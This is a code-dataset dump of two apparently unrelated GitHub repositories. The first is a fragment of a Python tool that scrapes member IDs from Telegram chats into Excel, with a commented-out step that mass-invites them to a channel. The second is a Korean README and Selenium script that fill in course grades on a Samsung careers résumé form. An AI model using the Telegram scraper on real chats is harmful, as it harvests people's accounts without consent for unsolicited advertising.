your phone: \"))\n\tusername = str(input(\"Enter your username (eg: @David_Cherednik): \"))\n\n\t#Setting config\n\tconfig.set(\"Init\", \"isInit\", \"true\")\n\n\tconfig.set(\"TelegramAPI\", \"api_id\", api_id)\n\tconfig.set(\"TelegramAPI\", \"api_hash\", api_hash)\n\n\tconfig.set(\"Telegram\", \"phone\", phone)\n\tconfig.set(\"Telegram\", \"username\", username)\n\n\t#Writing to config\n\twith open(configName, 'w') as file:\n\t\tconfig.write(file)\n\n\t#Printing successfull\n\tos.system(\"cls\")\n\tprint(\"**SUCCESSFULL**\")\n\tos.system(\"cls\")" }, { "alpha_fraction": 0.7364621162414551, "alphanum_fraction": 0.7364621162414551, "avg_line_length": 33.75, "blob_id": "72665d531f26cfbb6795c34e965102444861360d", "content_id": "5fd60ab6fe0735a8dc188a5aff928ef280e2c016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 81, "num_lines": 8, "path": "/help.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "def welcom():\n\twelcomText = \"\"\"\n\tTo stop the process press Ctrl+C\\n\n\tIf you have any questions write on [email protected]\\n\n\tIt script can extract only CHAT's members, not channel\\n\n\tIf you stoped script when it getting ids, you should do the instruction in app\\n\n\t\"\"\"\n\tprint(welcomText)" }, { "alpha_fraction": 0.6986211538314819, "alphanum_fraction": 0.70124751329422, "avg_line_length": 27.679244995117188, "blob_id": "639ad2665be39aa4be3bc0f4b13b43580003c7da", "content_id": "2ee43e4a76fff194e3d54468c98834a8fa461e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 180, "num_lines": 53, "path": "/main.py", "repo_name": "Max0nyM/TelegramAd", "src_encoding": "UTF-8", "text": "from getId import getId\nfrom writeToExcel import writeToExcel\n#from inviteToChannel import inviteToChannel\nfrom help import 
welcom\nimport init\n\nfrom sqlite3 import OperationalError\n\ndef main():\n\twelcom()\n\n\t#Initialization\n\tinit.initConfig()\n\ttry:\n\t\tclient = init.initClient()\n\texcept OperationalError:\n\t\tprint(\"Database is locked. It maybe you close app when it parse ids.\\nWait, and if it no work, delete config.ini,\\n@<your username>.session and @<your username>.session-journal\")\n\t\treturn\n\n\t#Get info\n\tname = str(input(\"Enter name of Telegram channel (eg: @howdyho, but without @ - howdyho): \"))\n\tlimit = int(input(\"Enter limit of parse user (take into account - 1 member = 1/4 of second): \"))\n\n\twhile True:\n\t\tid = getId(client, name, limit)\n\t\tif not id:\n\t\t\tname = str(input(\"Enter name of Telegram channel (eg: @howdyho, but without @ - howdyho): \"))\n\t\t\tid = getId(client, name, limit)\n\t\telse:\n\t\t\tbreak\n\n\t\"\"\"channelInvite = str(input(\"Enter name of Telegram channel (eg: @savemdk, but without @ - savemdk) to invite users in it: \"))\n\n\twhile True:\n\t\tinviting = inviteToChannel(client, channelInvite, id)\n\t\tif not inviting:\n\t\t\tchannelInvite = str(input(\"Enter name of Telegram channel (eg: @savemdk, but without @ - savemdk) to invite users in it: \"))\n\t\t\tinviting = inviteToChannel(client, channelInvite, id)\n\t\telse:\n\t\t\tbreak\n\n\tfileName = str(input(\"Enter name of excel file: \"))\"\"\"\n\twriteToExcel(id, fileName)\n\t\n\n\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\nStoping...\")\n\t\texit()\n\n\n\n" } ]
6
barskern/hdrie
https://github.com/barskern/hdrie
653d84a77f561fb0272221a858ce90ba559f1def
d4ff19f03b9e631094525643ddfc2a54ff622594
947bd97888bf4c75a32a27d496c134e7e1e5868c
refs/heads/master
2020-05-01T12:16:25.415354
2019-03-30T17:47:37
2019-03-30T17:47:37
177,461,998
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6157894730567932, "alphanum_fraction": 0.621052622795105, "avg_line_length": 21.799999237060547, "blob_id": "fae809a1e389a9e4c4995df937263a11e931e8e9", "content_id": "c841749e1d736983e3bec6b506fc8a98dfd245a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 570, "license_type": "permissive", "max_line_length": 82, "num_lines": 25, "path": "/setup.py", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE.md') as f:\n license = f.read()\n\nsetup(\n name='hdrie',\n version='0.0.1',\n description='Transform images to HDR and render them with several techniques',\n long_description=readme,\n author='Ole Martin Ruud',\n author_email='[email protected]',\n setup_requires=[\n 'pytest-runner',\n ],\n tests_require=[\n 'pytest',\n ],\n url='https://github.com/barskern/hdrie',\n license=license,\n packages=find_packages(exclude=('tests'))\n)\n" }, { "alpha_fraction": 0.578125, "alphanum_fraction": 0.625, "avg_line_length": 15, "blob_id": "8a06ef9652a388d36f9768b8520b5fa2e3b51a42", "content_id": "485c6b687643e123e3ad7473dfe614834f21fc9c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 64, "license_type": "permissive", "max_line_length": 32, "num_lines": 4, "path": "/tests/hdrie_test.py", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "import hdrie\n\ndef test_plus():\n assert hdrie.plus(2, 3) == 5\n" }, { "alpha_fraction": 0.7643678188323975, "alphanum_fraction": 0.7643678188323975, "avg_line_length": 57, "blob_id": "e1900bbae3dfab7ab1349cd8095f28eba588ba04", "content_id": "70d4430131e24d12d0f4350dc3bcbdcd9d696bed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 348, "license_type": "permissive", 
"max_line_length": 135, "num_lines": 6, "path": "/README.md", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "# HDRIE\n\n[![Build Status](https://travis-ci.com/barskern/hdrie.svg?token=S3nA1j4MQ8fzYt5KzyxX&branch=master)](https://travis-ci.com/barskern/hdrie)\n[![codecov](https://codecov.io/gh/barskern/hdrie/branch/master/graph/badge.svg?token=kYGkwROnqu)](https://codecov.io/gh/barskern/hdrie)\n\nA library to transform images to HDR and render them with several techniques.\n" }, { "alpha_fraction": 0.5222222208976746, "alphanum_fraction": 0.5222222208976746, "avg_line_length": 17, "blob_id": "2b00648743d8beaaeeb855c037eee3f2e2720412", "content_id": "cf586f8c865f7132272de6a0059018b9529a7141", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "permissive", "max_line_length": 40, "num_lines": 5, "path": "/hdrie/__init__.py", "repo_name": "barskern/hdrie", "src_encoding": "UTF-8", "text": "def plus(x, y):\n \"\"\"\n Adds two numbers and returns the sum\n \"\"\"\n return x + y\n" } ]
4
emailman/tkinter_demos
https://github.com/emailman/tkinter_demos
0b2338a0e6d7d5c8b38c9f6d8ff433d1761cfd55
f08263da7e6be5891dbd1bdafa186ffe353fc066
00b404a6bd37149abf663b0db3eb2430c74cd19c
refs/heads/master
2021-01-25T07:40:40.971727
2017-06-07T15:22:22
2017-06-07T15:22:22
93,650,093
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5411408543586731, "alphanum_fraction": 0.5643614530563354, "avg_line_length": 34.375, "blob_id": "9855ae5d3f717352aba88c39d0054c64cfbfd235", "content_id": "dc5f6c2eca651e2d8a4beea90fee3e7a48572466", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1981, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/tkinter demo 6.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import messagebox\nfrom math import pi\n\n# A form to calculate the area of a circle given the radius\n\n\nclass Form1:\n def __init__(self):\n\n window = Tk()\n window.title(\"Tkinter Demo 6\")\n window.geometry(\"300x200\")\n\n # Create the fields\n Label(window, text=\"Enter the radius: \", font=(\"Arial\", 14),\n foreground=\"Blue\").grid(row=1, column=1, padx=5, pady=10)\n\n # Declare a DoubleVar and textvariable to read the user entry\n # from an Entry field as a decimal value\n self.radius = DoubleVar()\n Entry(window, font=(\"Arial\", 14), foreground=\"Blue\", width=10,\n textvariable=self.radius).grid(row=1, column=2, pady=10)\n\n btn_calculate_area =\\\n Button(window, text=\"Calculate Area\", font=(\"Arial\", 14),\n foreground=\"Green\", command=self.process_click)\n btn_calculate_area.grid(row=2, column=1, columnspan=2, pady=10)\n\n Label(window, text=\"Area =\", font=(\"Arial\", 14),\n foreground=\"Blue\").grid(row=3, column=1, pady=10, sticky=E)\n\n self.lbl_area = Label(window, text=\"\", font=(\"Arial\", 14),\n foreground=\"Blue\")\n self.lbl_area.grid(row=3, column=2, pady=10, sticky=W)\n\n window.mainloop()\n\n # Handle the button click\n def process_click(self):\n # Try to calculate the area of a circle given the radius\n try:\n if self.radius.get() >= 0:\n area = pi * self.radius.get() ** 2\n area_formatted = \"{:.2f}\".format(area)\n self.lbl_area.config(text=area_formatted)\n else:\n messagebox.showerror(\"My 
Area Calculator\",\n \"Negative radius is not allowed\")\n except TclError:\n messagebox.showerror(\"My Area Calculator\",\n \"Missing or non-numeric entry\")\n\n\n# Create a GUI object\nForm1()\n" }, { "alpha_fraction": 0.6633663177490234, "alphanum_fraction": 0.6782178282737732, "avg_line_length": 17.9375, "blob_id": "89932d2cbb803ce3f7edd39ec429cbd4f7559c92", "content_id": "665a4ca609a264e9f4fc4d65a4629ffa68f756cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 67, "num_lines": 32, "path": "/tkinter demo 3.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Respond to a button click by changing the text in a label\n\n# These need to defined globally\n\nwindow = Tk()\nlabel = Label()\n\n\ndef process_click():\n # Change the label in response to the button click\n label.config(text=\"Thanks for clicking\")\n\n\ndef demo3():\n\n # Set the window title and size\n\n window.title(\"Tkinter Demo 3\")\n window.geometry(\"200x100\")\n\n global label\n label = Label(window, text=\"This Is Getting Interesting\")\n button = Button(window, text=\"Click Me\", command=process_click)\n\n label.pack()\n button.pack()\n\n window.mainloop()\n\ndemo3()\n" }, { "alpha_fraction": 0.5536723136901855, "alphanum_fraction": 0.5870056748390198, "avg_line_length": 34.400001525878906, "blob_id": "7457cd66fb0a3dd15bad2fdbcb9c8439d4e5064a", "content_id": "af4537b6b1e08a940b2aa50374f97d78f6eb9dc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1770, "license_type": "no_license", "max_line_length": 118, "num_lines": 50, "path": "/tkinter demo 8.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Use three sliders to create a color mixer\n\n\nclass ColorMixer:\n def __init__(self):\n window = Tk()\n window.title(\"Color 
Mixer\")\n\n self.sldr_red = Scale(window, to=\"255\", orient=HORIZONTAL, troughcolor=\"RED\", fg=\"RED\",\n length=175, command=self.slider_moved)\n self.sldr_red.grid(row=1, column=1)\n\n self.sldr_green = Scale(window, to=\"255\", orient=HORIZONTAL, troughcolor=\"GREEN\", fg=\"GREEN\",\n length=175, command=self.slider_moved)\n self.sldr_green.grid(row=2, column=1)\n\n self.sldr_blue = Scale(window, to=\"255\", orient=HORIZONTAL, troughcolor=\"BLUE\", fg=\"BLUE\",\n length=175, command=self.slider_moved)\n self.sldr_blue.grid(row=3, column=1)\n\n # Create a canvas on which to draw a circle\n self.canvas = Canvas(window, width=200, height=200, bg=\"grey\")\n self.canvas.grid(row=4, column=1, padx=10, pady=10) # Important: this must not be included in the line above!\n\n # Create a circle on the canvas: corner = (50, 50), diameter = 150\n self.circle = self.canvas.create_oval(50, 50, 150, 150)\n\n window.mainloop()\n\n def slider_moved(self, value):\n red = format(self.sldr_red.get(), '02x')\n print(\"red =\", red)\n\n green = format(self.sldr_green.get(), '02x')\n print(\"green =\", green)\n\n blue = format(self.sldr_blue.get(), '02x')\n print(\"blue =\", blue)\n\n # Convert the three hex values to a valid hex string\n mix = \"#\" + red + green + blue\n print(\"mix =\", mix)\n\n # Configure the fill property of the circle on the canvas\n self.canvas.itemconfig(self.circle, fill=mix)\n\n\nColorMixer()\n" }, { "alpha_fraction": 0.5716791749000549, "alphanum_fraction": 0.5889724493026733, "avg_line_length": 31.97520637512207, "blob_id": "e0a8b005f271e9894ca97e04d3737692dfc9c1ff", "content_id": "b46b87b88809e7f5f0c51149be1114c1ca5005a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3990, "license_type": "no_license", "max_line_length": 119, "num_lines": 121, "path": "/tkinter demo 7.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Use radio buttons and 
check buttons to build an ordering menu\n\n\nclass OrderUp:\n\n def __init__(self):\n window = Tk()\n window.title(\"Welcome to Jimmy John's\")\n\n Label(text=\"Order Menu\").grid(row=0, column=1, columnspan=3)\n\n Label(text=\"Choose Your Meat \").grid(row=1, column=1)\n\n self.meat = IntVar() # variable for all meat choices\n\n rbtn_ham = Radiobutton(window, text=\"ham\", variable=self.meat, command=self.choose_meat, value=1)\n rbtn_ham.grid(row=2, column=1, sticky=W)\n\n rbtn_turkey = Radiobutton(window, text=\"turkey\", variable=self.meat, command=self.choose_meat, value=2)\n rbtn_turkey.grid(row=3, column=1, sticky=W)\n\n rbtn_roast_beef = Radiobutton(window, text=\"roast beef\", variable=self.meat, command=self.choose_meat, value=3)\n rbtn_roast_beef.grid(row=4, column=1, sticky=W)\n\n Label(text=\"Choose Your Bread \").grid(row=1, column=2)\n\n self.bread = IntVar() # variable for all bread choices\n\n rbtn_ham = Radiobutton(window, text=\"white\", variable=self.bread, command=self.choose_bread, value=1)\n rbtn_ham.grid(row=2, column=2, sticky=W)\n\n rbtn_turkey = Radiobutton(window, text=\"wheat\", variable=self.bread, command=self.choose_bread, value=2)\n rbtn_turkey.grid(row=3, column=2, sticky=W)\n\n rbtn_roast_beef = Radiobutton(window, text=\"rye\", variable=self.bread, command=self.choose_bread, value=3)\n rbtn_roast_beef.grid(row=4, column=2, sticky=W)\n\n Label(text=\"Choose Your Condiments \").grid(row=1, column=3)\n\n self.mayo = IntVar()\n cbtn_mayo = Checkbutton(window, text=\"mayo\", variable=self.mayo, command=self.choose_mayo)\n cbtn_mayo.grid(row=2, column=3, sticky=W)\n\n self.ketchup = IntVar()\n cbtn_ketchup = Checkbutton(window, text=\"ketchup\", variable=self.ketchup, command=self.choose_ketchup)\n cbtn_ketchup.grid(row=3, column=3, sticky=W)\n\n self.mustard = IntVar()\n cbtn_mustard = Checkbutton(window, text=\"mustard\", variable=self.mustard, command=self.choose_mustard)\n cbtn_mustard.grid(row=4, column=3, sticky=W)\n\n btn_order = 
Button(window, text=\"ORDER\", command=self.place_order)\n btn_order.grid(row=5, column=1, columnspan=3)\n\n self.show_order = StringVar()\n self.lblOrder = Label(window, textvariable=self.show_order)\n self.lblOrder.grid(row=6, column=1, columnspan=3)\n self.show_order.set(\"Your order will appear here\")\n\n window.mainloop()\n\n def choose_meat(self):\n print(\"meat =\", self.meat.get())\n\n def choose_bread(self):\n print(\"bread =\", self.bread.get())\n\n def choose_mayo(self):\n print(\"mayo =\", self.mayo.get())\n\n def choose_ketchup(self):\n print(\"ketchup =\", self.ketchup.get())\n\n def choose_mustard(self):\n print(\"mustard =\", self.mustard.get())\n\n def place_order(self):\n\n if self.meat.get() == 1:\n choice1 = \"ham\"\n elif self.meat.get() == 2:\n choice1 = \"turkey\"\n elif self.meat.get() == 3:\n choice1 = \"roast beef\"\n else:\n choice1 = \"no meat chosen\"\n print(\"meat =\", choice1)\n\n if self.bread.get() == 1:\n choice2 = \"white\"\n elif self.bread.get() == 2:\n choice2 = \"wheat\"\n elif self.bread.get() == 3:\n choice2 = \"rye\"\n else:\n choice2 = \"no bread chosen\"\n print(\"bread =\", choice2)\n\n choice3 = \"\"\n if self.mayo.get() == 1:\n choice3 += \" mayo,\"\n\n if self.ketchup.get() == 1:\n choice3 += \" ketchup,\"\n\n if self.mustard.get() == 1:\n choice3 += \" mustard,\"\n\n if choice3 == \"\":\n order = \"Ordering \" + choice1 + \" on \" + choice2\n else:\n order = \"Ordering \" + choice1 + \" on \" + choice2 + \" with\" + choice3[:-1]\n\n print(order)\n\n self.show_order.set(order)\n\n\nOrderUp()\n" }, { "alpha_fraction": 0.6088709831237793, "alphanum_fraction": 0.6199596524238586, "avg_line_length": 26.55555534362793, "blob_id": "9deb85623487c2d63a5e2609eca42666efd1240d", "content_id": "173f8db751f1cb1aefbd0e3dc301d484eb2d56cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 992, "license_type": "no_license", "max_line_length": 73, "num_lines": 36, "path": 
"/tkinter demo 4.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Respond to a button click by changing the text in a label\n\n# All code and variables are contained in functions\n# All functions are contained in a class\n\n\nclass ButtonAndLabel:\n # Constructor\n def __init__(self):\n\n window = Tk()\n # Set the window title and size\n window.title(\"Tkinter Demo 4\")\n window.geometry(\"300x100\")\n\n # Create a label and a button with a font and a color\n self.label = Label(window, text=\"This Is Getting Interesting\",\n font=(\"Arial\", 14), foreground=\"Blue\")\n\n self.button = Button(window, text=\"Click Me\", font=(\"Arial\", 14),\n foreground=\"Green\", command=self.process_click)\n\n self.label.pack()\n self.button.pack()\n\n window.mainloop()\n\n def process_click(self):\n # Change the label in response to the button click\n self.label.config(text=\"Thanks for clicking\")\n\n\n# Create a GUI object\nButtonAndLabel()\n" }, { "alpha_fraction": 0.5620155334472656, "alphanum_fraction": 0.5891472697257996, "avg_line_length": 30.463415145874023, "blob_id": "ee2354d56a5b639733176963c42a6d46bfe42707", "content_id": "d1325db2e345a572857261212a5dde9727c89aaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1290, "license_type": "no_license", "max_line_length": 76, "num_lines": 41, "path": "/tkinter demo 5.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Layout a simple form using the Grid Manager\n\n\nclass Form1:\n def __init__(self):\n\n window = Tk()\n window.title(\"Tkinter Demo 5\")\n window.geometry(\"400x200\")\n\n # Create the fields\n Label(window, text=\"Enter your name: \", font=(\"Arial\", 14),\n foreground=\"Blue\").grid(row=1, column=1, pady=10)\n\n # Declare a StringVar and textvariable\n # to read the user entry from an Entry field\n self.name = StringVar()\n Entry(window, 
font=(\"Arial\", 14), foreground=\"Blue\",\n textvariable=self.name).grid(row=1, column=2, pady=10)\n\n btn_greeting =\\\n Button(window, text=\"Announce Guest\", font=(\"Arial\", 14),\n foreground=\"Green\", command=self.process_click)\n btn_greeting.grid(row=2, column=1, columnspan=2, pady=10)\n\n self.lbl_message = Label(window, text=\"Welcome\", font=(\"Arial\", 14),\n foreground=\"Blue\")\n self.lbl_message.grid(row=3, column=1, columnspan=2, pady=10)\n\n window.mainloop()\n\n # Handle the button click\n def process_click(self):\n # Show a welcome message for the guest\n self.lbl_message.config(text=\"Welcome \" + self.name.get())\n\n\n# Create a GUI object\nForm1()\n" }, { "alpha_fraction": 0.6720647811889648, "alphanum_fraction": 0.6781376600265503, "avg_line_length": 18.760000228881836, "blob_id": "2372b77a11bead5040a4bce2f7ccd05fc6615d81", "content_id": "dd50dc0ea4bfc40b4d1d6e3bba6d5cae85698dfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "no_license", "max_line_length": 67, "num_lines": 25, "path": "/tkinter demo 2.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import messagebox\n\n# Provide a function to respond to a button click\n\n\ndef process_click():\n messagebox.showinfo(\"My Dialog Box\", \"You Clicked Me\")\n\n\ndef demo2():\n window = Tk()\n window.title(\"Tkinter Demo 2\")\n\n label = Label(window, text=\"This Is Getting Interesting\")\n\n # Set the action for a button click\n button = Button(window, text=\"Click Me\", command=process_click)\n\n label.pack()\n button.pack()\n\n window.mainloop()\n\ndemo2()\n" }, { "alpha_fraction": 0.6290322542190552, "alphanum_fraction": 0.6387096643447876, "avg_line_length": 16.22222137451172, "blob_id": "d0da4f5d2a3fe335341ed96ab246043280512a35", "content_id": "de017d6c3658ffbc96b3fe81cf46273f2780c8bc", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/tkinter demo 1.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Show a button and a label, but no action\n\n\ndef demo1():\n window = Tk()\n window.title(\"Tkinter Demo 1\")\n\n label = Label(window, text=\"This Is Getting Interesting\")\n button = Button(window, text=\"Click Me\")\n\n label.pack()\n button.pack()\n\n window.mainloop()\n\ndemo1()\n" } ]
8
cupyty/samsungGradeinput
https://github.com/cupyty/samsungGradeinput
afb9c7a82ecfe12ade4e1b5edc084b5bb94886d7
75b4d3b4efa383adf326f0741eedc9d6eaec93ef
c0a774b109c5bd426bbd57018419cf39796ab7b8
refs/heads/master
2020-07-23T22:35:44.422384
2019-09-09T05:04:20
2019-09-09T05:04:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6316981315612793, "alphanum_fraction": 0.648301899433136, "avg_line_length": 35.80555725097656, "blob_id": "b9006fba5835213b18f597a1cb7a1ff13e8d6f28", "content_id": "0509bd66f2bcc85db60e6beceb917748beda5be8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2527, "license_type": "no_license", "max_line_length": 89, "num_lines": 36, "path": "/README.md", "repo_name": "cupyty/samsungGradeinput", "src_encoding": "UTF-8", "text": "# samsungGradeinput\n삼성 채용 이력서 작성에 필요한 이수학점 입력을 크롤링으로 해결합니다.\n\n__주의사항__ *경북대yes에서 제공하는 전체성적파일 양식을 따릅니다. *파이썬 에디터가 필요합니다.\n\n### 초기 설정\n1. 전체 파일을 다운로드합니다.\n2. 본인의 크롬의 버전에 맞는 chromdriver를 원하는 위치에 설치합니다. https://chromedriver.chromium.org/downloads\n3. 경북대 yes에 접속하여 성적 카테고리에 들어가 전체 이수성적 엑셀파일을 다운로드합니다.\n * xls 파일 형식일 경우 xlsx로 업그레이드시켜줍니다. (xls는 프로그램에서 다룰 수 없습니다.)\n4. 전체성적 엑셀파일을 편의를 위해서 파이썬 파일(gradecraw.py)과 같은 위치에 둡니다.\n5. 파이썬 파일을 편집 모드로 열어주시고, ####주석을 찾습니다.\n\n #따옴표안에 아이디(이메일)와 비밀번호를 적습니다.\n s_id, s_pa = '' \n \n #따옴표안에 전체성적.xlsx파일의 경로를 적습니다. 파이썬 파일과 같은 위치일경우 pass\n load_wb = load_workbook(\"전체성적.xlsx\", data_only=True)\n \n #따옴표안에 chromedriver의 경로를 적습니다. 밑과 같은 위치라면 pass\n driver = webdriver.Chrome('C:\\\\chromedriver')\n \n # 63번 줄에 있는 코드에서 엑셀에 끝항목을 적어주세요 예로 F50에 끝난다면 F3 자리에 F50으로 고쳐주세요\n # 여유공간을 두어도 무방합니다. \n multiple_cells = load_ws['A2':'F3']\n\n### 설정이 끝나면\n* 파이썬 에디터에서 파이썬 파일을 실행시켜주세요. 크롬 창이 뜨고 크롤링이 시작됩니다.\n* 콘솔 창에 나오는 에러는 확인을 위해 나오는 것입니다. 계속 진행하시면 됩니다.\n * 같은 에러가 계속해서 나오고, 크롤링이 멈춘 것같다면 해당되는 하얀색 칸을(사진 참고) 한번만 클릭해주세요\n <img src=\"IMG_9209.jpg\" width=\"200px\"></img>\n * 다른 에러가 뜬다면 프로그램을 종료시키고, 다시 실행해주세요.\n* 파이썬이 실행시킨 크롬창을 최소화하면 안됩니다. 진행이 안됩니다. \n* 이 프로그램은 1회수강을 고정해두고있습니다. 
재이수 과목이 있을 경우 (프로그램이 끝나고) 직접 수정해야합니다.\n\n### *프로그램이 끝난다면, 창을 끄기 전에 삼성 이력서 저장을 해주세요!*\n" }, { "alpha_fraction": 0.47488516569137573, "alphanum_fraction": 0.48747962713241577, "avg_line_length": 30.390697479248047, "blob_id": "3dd42b21f7cf24c950acc67657b678fb08e4c8d4", "content_id": "9384a70c411794f270cea07e49b65eafdc611eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7621, "license_type": "no_license", "max_line_length": 100, "num_lines": 215, "path": "/gradecraw.py", "repo_name": "cupyty/samsungGradeinput", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nfrom openpyxl import load_workbook\n\n#### 삼성 아이디(이메일)와 비밀번호를 적어주세요\ns_id = '여기에 이메일을 적어주세요 삼성아이디(이메일)'\ns_pa = '여기에 비밀번호를 적어주세요'\n\n# data_only=Ture로 해줘야 수식이 아닌 값으로 받아온다.\n#### 전체성적 엑셀파일을 이 파이썬 파일과 같은 위치에 놔둬야합니다.\n#### 아니면 \"전체성적엑셀파일이 있는 경로\"를 적어주세요\n#### yes.knu.ac.kr 에 있는 성적 전체엑셀파일 형식만 가능합니다.\n#### xls로 되어있다면 xlsx로 업그레이드 해주셔야합니다.\nload_wb = load_workbook(\"전체성적.xlsx\", data_only=True)\n# 시트 이름으로 불러오기\nload_ws = load_wb['Sheet']\n\n# Chrome(' 이 위치에 chromedriver파일 위치를 넣어준다. 
밑은 예시로 c드라이브안에 바로 넣었을때') driver connect\ndriver = webdriver.Chrome('C:\\\\chromedriver')\n\ncnt = 0\n\ndef gr_craw(sam_id, sam_pass):\n driver.get('https://www.samsungcareers.com/rec/apply/ComResumeServlet')\n time.sleep(3)\n tmp = driver.find_element_by_name('email')\n tmp.send_keys(sam_id)\n tmp = driver.find_element_by_name('password')\n tmp.send_keys(sam_pass)\n tmp.send_keys(Keys.RETURN) ## 로긴 버튼 클릭\n time.sleep(2)\n alert = driver.switch_to.alert\n alert.accept()\n time.sleep(3)\n\n driver.find_element_by_xpath(\n '//*[@id=\"cont\"]/div[1]/ul/div/dl/dd[1]/p/span/a'\n ).click() ## 3급신입채용 클릭\n time.sleep(4)\n\n try:\n tmp = driver.find_element_by_xpath('//*[@id=\"masTable1\"]/tr/td[3]/a')\n except:\n time.sleep(2)\n tmp = driver.find_element_by_xpath('//*[@id=\"masTable1\"]/tr/td[3]/a')\n\n tmp.click() ## 작성중 이력서 항목중 1번째 클릭\n time.sleep(4)\n alert = driver.switch_to.alert\n alert.accept()\n time.sleep(2)\n\n tmp= driver.find_element_by_xpath(\n '//*[@id=\"cont\"]/table[1]/tbody/tr/td/table/tbody/tr/td/table/tbody/tr/td/div[2]/ul/li[3]/a'\n )\n tmp.click() ## 이수교과목 클릭\n time.sleep(2)\n alert = driver.switch_to.alert\n alert.accept()\n time.sleep(2)\n\n multiple_cells = load_ws['A2':'F60']\n while 1:\n try:\n time.sleep(2)\n driver.find_element_by_name('tmp_schlcarrcdView').click() ## 학사버튼클릭하기\n time.sleep(2)\n driver.find_element_by_xpath(\n '//*[@id=\"applyform_tmp_schlcarrcd_5\"]'\n ).click() ## 버튼클릭하기\n break\n except:\n print('과정선택 에러')\n time.sleep(2)\n continue\n while 1:\n try:\n print(2)\n driver.find_element_by_name(\n 'tmp_majcdView'\n ).click() ## 전공명버튼클릭하기\n time.sleep(1)\n driver.find_element_by_xpath(\n '//*[@id=\"applyform_tmp_majcd_22WD\"]'\n ).click() ## 버튼클릭하기\n break\n except:\n print('전공명선택 에러')\n time.sleep(5)\n continue\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_retakeynView'\n ).click() ## 버튼클릭하기\n time.sleep(2)\n driver.find_element_by_id('applyform_tmp_retakeyn_N').click() ## 버튼클릭하기\n break\n except:\n print('재수강여부 에러')\n 
time.sleep(1)\n continue\n\n for row in multiple_cells:\n list_r = []\n for cell in row:\n list_r.append(cell.value) # 한 row 정보를 임시 list에 저장\n\n if list_r[0] == None:\n break\n if list_r[1] == '':\n continue\n\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_regyrView'\n ).click() ## 수강년도버튼클릭하기\n time.sleep(1)\n st_yr = 'applyform_tmp_regyr_'+ list_r[0][0:4]\n driver.find_element_by_id(st_yr).click()\n break\n except:\n print('수강년도선택 에러')\n time.sleep(1)\n continue\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_semstView'\n ).click() ## 버튼클릭하기\n time.sleep(1)\n st_semst = ''\n if list_r[0][4]=='S':\n st_semst = 'applyform_tmp_semst_여름계절'\n elif list_r[0][4] == 'W':\n st_semst = 'applyform_tmp_semst_겨울계절'\n else:\n st_semst = 'applyform_tmp_semst_'+list_r[0][4]\n driver.find_element_by_id(st_semst).click() ## 학기버튼클릭하기\n break\n except:\n print('학기선택 에러')\n time.sleep(1)\n continue\n print(list_r)\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_majtypecdView'\n ).click() ## 과목유형버튼클릭하기\n st_matype=''\n time.sleep(1)\n if '공학전공' in list_r[1]:\n driver.find_element_by_id('applyform_tmp_majtypecd_A').click() ## 전공 클릭\n else:\n driver.find_element_by_id('applyform_tmp_majtypecd_C').click() ## 교양 클릭\n break\n except:\n print('과목유형선택 에러')\n time.sleep(1)\n continue\n st_name = driver.find_element_by_name('tmp_majcurrinm')\n st_name.send_keys(list_r[3])\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_obtptView'\n ).click() ## 버튼클릭하기\n 